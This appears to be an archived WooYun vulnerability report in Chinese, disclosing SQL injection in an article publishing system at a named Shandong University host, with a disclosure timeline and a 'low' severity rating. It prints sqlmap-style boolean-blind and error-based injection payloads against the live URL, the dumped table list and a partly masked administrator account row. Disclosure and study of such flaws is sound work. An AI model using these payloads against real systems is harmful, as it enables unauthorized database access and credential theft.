乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-17: 厂商已经确认,细节仅向厂商公开 2015-11-27: 细节向核心白帽子及相关领域专家公开 2015-12-07: 细节向普通白帽子公开 2015-12-17: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
山东大学某处注入漏洞沦陷文章发布系统
http://tjsl.sdu.edu.cn/TestCenter/SubPage/list.php?ClassID=1 and 1=1&pagenow=2 存在注入漏洞
Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://tjsl.sdu.edu.cn:80/TestCenter/SubPage/list.php?ClassID=1 and 1=-3324 OR 5387=5387#&pagenow=2 Vector: OR [INFERENCE]# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://tjsl.sdu.edu.cn:80/TestCenter/SubPage/list.php?ClassID=1 and 1=1 AND (SELECT 5525 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(5525=5525,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pagenow=2 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web application technology: PHP 5.2.13, Apache 2.2.15back-end DBMS: MySQL 5.0
获得表名:
Database: tjsl[37 tables]+-----------------------+| pe_article_鏉堟挸鍤柨娆抃\?af\\?af || pe_actions || pe_admin || pe_adzone || pe_announce || pe_article || pe_channel || pe_city || pe_class || pe_comment || pe_config || pe_consumelog || pe_contacter || pe_country || pe_delivertype || pe_dictionary || pe_friendsite || pe_histrolynews || pe_houseconfig || pe_infos || pe_item || pe_jsfile || pe_label || pe_log || pe_mailchannel || pe_menu || pe_newkeys || pe_payplatform || pe_province || pe_skin || pe_template || pe_templateproject || pe_user || pe_usergroup || pe_users || pe_usertype || pe_works |+-----------------------+
文章发布系统管理员账户密码20个:这里列出一个证明
[11 entries]+----+---------------+-----------------+----------+| id | username | password | usertype |+----+---------------+-----------------+----------+| 1 | administrator | ce****46 | 2 |+----+---------------+-----------------+----------+
注入到管理内容管理系统后台:
参数过滤
危害等级:低
漏洞Rank:4
确认时间:2015-11-17 16:16
已通报系统所属单位处置
暂无